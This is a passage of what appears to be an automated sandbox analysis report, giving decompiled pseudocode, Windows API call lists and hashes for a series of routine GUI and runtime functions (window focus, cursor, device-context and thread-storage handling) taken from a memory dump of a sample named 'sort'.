Opcode ID: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction ID: 05942f404d56e3bc249559bb1a558a0c6e37b23f98baaac5964d945a6837c05d
Opcode Fuzzy Hash: ef22ae36b66fc6a2d65463419495730ca9f2549ea02bd598369f82df62db7c6c
Instruction Fuzzy Hash: 03216A31A00609FFCF229F54DC48EFF7BB9EB88744B44452AF90596261D774AC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00420B23, Relevance: 7.6, APIs: 5, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
				void* _t21;
				signed char _t22;
				signed int _t40;
				intOrPtr* _t44;
				void* _t45;
				struct HWND__* _t47;

				_t45 = __ebp;
				_t40 = _a4;
				_t44 = __ecx;
				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
					E004166CE(__ecx, 0);
					return SetFocus(0);
				}
				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
				if(_t21 != 0) {
					return _t21;
				} else {
					if(_t40 != 0) {
						_t22 =  *(_t44 + 0x24);
						_push(_t45);
						if((_t22 & 0x00000080) != 0) {
							 *(_t44 + 0x24) = _t22 & 0x0000007f;
							 *((intOrPtr*)( *_t44 + 0x8c))();
							_t47 =  *(_t44 + 0x1c);
							if(GetActiveWindow() == _t47) {
								SendMessageA(_t47, 6, 1, 0);
							}
						}
						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
							 *((intOrPtr*)( *_t44 + 0x88))();
						}
					}
					asm("sbb edi, edi");
					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
				}
			}

APIs

SetFocus.USER32(00000000,00000000), ref: 00420B3F
GetParent.USER32(?), ref: 00420B4D
GetActiveWindow.USER32 ref: 00420B99
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00420BAA
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420BBF

Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction ID: b973cea33cd40a65d929727e5f9c9eb7024a6c5d1ea90242926d9fabef0d3f3f
Opcode Fuzzy Hash: 41abd3b57886a5f7d358e044880a08afca2a9066e6390131e2ec1389df34b110
Instruction Fuzzy Hash: E91106313003105FD7305FA4EC84B1BBBE9AF59B08F500A2EF596AA2D2CB74B841870C

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD9, Relevance: 7.6, APIs: 5, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00420BD9(void* __ecx, signed int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t32;
				void* _t33;
				struct HWND__* _t34;

				_t33 = __ecx;
				if((E00416528(__ecx) & 0x40000000) == 0) {
					_t32 = E00414DCC(__ecx);
				} else {
					_t32 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E004166B3(_t32);
					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t34 = _t20;
					if(_t34 == 0) {
						break;
					}
					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
						SendMessageA(_t34, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t34);
				}
				return _t20;
			}

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420C2F
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00420C43
GetDesktopWindow.USER32 ref: 00420C47
GetWindow.USER32(00000000), ref: 00420C54
SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 00420C75

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction ID: c41997b72d8c96214e5640ecb70f441624ebe3089d32e1eab02e12923e6e0a2e
Opcode Fuzzy Hash: 37ae4cba53c8f9abbb6458094d097816d73afe21348efe1223aaa5812bafa3d4
Instruction Fuzzy Hash: AA113A3134072573E3355722AC06F2FBAC89F41B94F95432AB6402A2D3CF59DC42839D

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				int _t20;
				unsigned int _t39;
				intOrPtr _t45;

				_v8 = __ecx;
				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
				if(_t45 != 0 && _a8 != 0) {
					_t39 = _a8 >> 0x10;
					if(_t39 != 0) {
						_t20 =  *(_t45 + 0xb0);
						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
						}
					}
				}
				return 0;
			}

0x00421546
0x0042154e
0x00421553
0x00421567
0x0042156d
0x00421573
0x0042157e
0x0042159e
0x004215ad
0x004215c3
0x004215cc
0x004215f0
0x004215f7
0x0042157e
0x0042156d
0x004215fc

APIs

GlobalGetAtomNameA.KERNEL32 ref: 0042159E
GlobalAddAtomA.KERNEL32 ref: 004215AD
GlobalGetAtomNameA.KERNEL32 ref: 004215C3
GlobalAddAtomA.KERNEL32 ref: 004215CC
SendMessageA.USER32(?,000003E4,?,?), ref: 004215F0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction ID: ddc056c18c8f30134593d029485027bb11089ec59ad006056310b0d46243fd91
Opcode Fuzzy Hash: 8d4100d216ef3efb6da3e926417cff5768516e73762e0a26ee689d182ea64f2a
Instruction Fuzzy Hash: EB119475600319AADB20EB68DC44AEBB3BCEB54700F404456E59697190E7B8EAC1CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004142C3, Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004142C3() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E00406520(E00429E28, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
						E00425F56(1);
						 *(_t40 - 4) = 0;
						_t9 = E00424BFB() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E00425FC6(1);
					}
					goto L5;
				}
				goto L6;
			}

APIs

__EH_prolog.LIBCMT ref: 004142C8
GetClassInfoA.USER32 ref: 004142E3
RegisterClassA.USER32 ref: 004142EE
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00414325
lstrcatA.KERNEL32(00000034,?), ref: 00414333

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction ID: 1018f0675467b52ee35bd5ff78e2a168c77a44711dd41a513890d329257c2a90
Opcode Fuzzy Hash: 916e8ed1c64fa195a03bc34d33fa3e71f0ae85317fb3a46a938f050b4ccd874b
Instruction Fuzzy Hash: D4112531B04218BECB10AFA5EC41BDE7FB8EF40304F00442BF816A3191C778E6418AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427EF7, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00427EF7(void* __ecx, char _a8) {
				struct tagPOINT _v12;
				void* __ebp;
				void* _t15;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;

				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t26 + 0x1c),  &_v12);
					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t28 = _t26 + 0x100;
						if( *_t28 == 0) {
							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
						}
						_push( *_t28);
					}
					SetCursor();
					_t15 = 0;
				} else {
					_t15 = E004136A7(__ecx);
				}
				return _t15;
			}

APIs

GetCursorPos.USER32(?), ref: 00427F10
ScreenToClient.USER32 ref: 00427F1D
LoadCursorA.USER32 ref: 00427F58
SetCursor.USER32(00000000), ref: 00427F72

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction ID: 6a5175c3ad254a8bfa5679941e9197540f95af319ead360478e78bd6a32066b2
Opcode Fuzzy Hash: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction Fuzzy Hash: EE019271718214EFDB209FA0DC49E9A77ACEF08315F81442BF94692250D778A981CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041031E, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041031E(void* _a4, void* _a8) {
				void* _v12;
				DEVMODEA* _t9;
				void* _t20;
				struct HDC__* _t22;
				signed short* _t23;

				if(_a4 == 0) {
					L5:
					return 0;
				}
				_t23 = GlobalLock(_a4);
				_t20 = _a8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t23 != 0) {
					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
					GlobalUnlock(_v12);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				} else {
					goto L5;
				}
			}

APIs

GlobalLock.KERNEL32 ref: 00410332
GlobalLock.KERNEL32 ref: 0041033F
CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction ID: 40030820e48ceddce583e067a62accdd91ad43b1dc9828fb23a1b5466954d7d6
Opcode Fuzzy Hash: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction Fuzzy Hash: D0F08C32200225ABC3709B69CC44B67BBDCEF84B91B144826BC98D2210D768DC9596B4

Uniqueness

Uniqueness Score: -1.00%

Function 00420766, Relevance: 7.5, APIs: 5, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420766(void* __ecx) {
				struct tagMSG _v28;
				void* _t9;
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t25 + 0x1c)) {
						ReleaseCapture();
					}
					_t13 = E00414DCC(_t25);
					 *((intOrPtr*)(_t25 + 0x50)) = 0;
					 *((intOrPtr*)(_t13 + 0x50)) = 0;
					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
				}
				return _t9;
			}

0x0042076b
0x00420772
0x00420795
0x0042079d
0x0042079d
0x004207a8
0x004207aa
0x004207aa
0x004207b2
0x004207b9
0x004207c1
0x00000000
0x004207ca
0x004207d0

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00420787
PostMessageA.USER32 ref: 0042079D
GetCapture.USER32 ref: 0042079F
ReleaseCapture.USER32 ref: 004207AA
PostMessageA.USER32 ref: 004207C7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction ID: 6827468c5831c533ec62b3620ea1e9f85116333d279ed9cea6cc2e4bf68413d0
Opcode Fuzzy Hash: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction Fuzzy Hash: 82F0A431600748BFC6306F22EC44D177FBCFF81748B85466EF54192512D736B5068A68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E53, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408E53() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x436fb0);
				if(_t16 == 0) {
					_t16 = E00407333(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
						E00406490(0x10);
					} else {
						E00408E40(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00408e61
0x00408e69
0x00408e6d
0x00408e78
0x00408e7e
0x00408ea8
0x00408e91
0x00408e92
0x00408e98
0x00408e9e
0x00408ea2
0x00408ea2
0x00408e7e
0x00408eaf
0x00408eb9

APIs

GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF

Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
GetCurrentThreadId.KERNEL32 ref: 00408E98

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC

Uniqueness

Uniqueness Score: -1.00%

Function 004239AC, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
				void* __esi;
				void* __ebp;
				int _t13;
				int _t14;
				intOrPtr _t16;
				void* _t19;
				struct tagRECT* _t21;

				if( *0x439c44 != 0) {
					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
				}
				if((_a8 & 0x00040600) == 0) {
					_push(GetSystemMetrics(6));
					_push(5);
				} else {
					_push(GetSystemMetrics(0x21));
					_push(0x20);
				}
				_t13 = GetSystemMetrics();
				_t21 = _a4;
				_t14 = InflateRect(_t21, _t13, ??);
				if((_a10 & 0x000000c0) != 0) {
					E00422A19(_t19, _t21);
					_t16 =  *0x439c9c; // 0x0
					_t21->top = _t21->top - _t16;
					return _t16;
				}
				return _t14;
			}

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
GetSystemMetrics.USER32 ref: 004239DF
GetSystemMetrics.USER32 ref: 004239F3
InflateRect.USER32(?,00000000), ref: 004239FA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 004258D4, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004258D4(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t15 + 0x14; // 0x4d1038
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t5 + 4));
						E00425BA0(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t3 = _t15 + 0x10; // 0x4c0158
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

0x004258d5
0x004258d8
0x004258dd
0x004258e0
0x004258e0
0x004258e6
0x004258e6
0x004258eb
0x004258ed
0x004258ed
0x004258f5
0x004258fc
0x004258fc
0x004258ed
0x00425900
0x00425900
0x00425905
0x0042590e
0x00425911
0x00425918
0x00425918
0x00425922
0x0042592a

APIs

TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
GlobalHandle.KERNEL32 ref: 00425908
GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
GlobalFree.KERNEL32 ref: 00425918
DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00428BA1, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428BA1(void* __ecx) {
				int _t22;

				_t22 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _t22;
			}

0x00428bb5
0x00428bb7
0x00428be3
0x00428bb9
0x00428bcc
0x00428bd8
0x00428bde
0x00428be0
0x00428bef

APIs

SaveDC.GDI32(?), ref: 00428BAF
GetStockObject.GDI32(0000000D), ref: 00428BBC
SelectObject.GDI32(00000000,00000000), ref: 00428BCC
SaveDC.GDI32(00000000), ref: 00428BD1
SelectObject.GDI32(00000000,?), ref: 00428BDE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C80F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct tagRECT _v44;
				signed int _v48;
				signed int _v52;
				struct tagRECT _v68;
				intOrPtr _t173;
				intOrPtr* _t174;
				intOrPtr _t177;
				signed char _t179;
				intOrPtr* _t181;
				signed char _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t202;
				signed int _t205;
				signed int _t206;
				signed int _t215;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t250;
				signed int _t252;
				signed int _t256;
				signed int _t260;
				void* _t263;
				signed int _t266;
				signed int _t268;
				intOrPtr _t272;
				signed int _t275;
				signed int _t279;

				_t263 = __edx;
				_t227 = __ecx;
				_t266 = 0;
				_push(0);
				_push(0);
				_push(0x418);
				_v8 = 0;
				_v52 = 0;
				_v48 = 0;
				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
				_v28 = _t275;
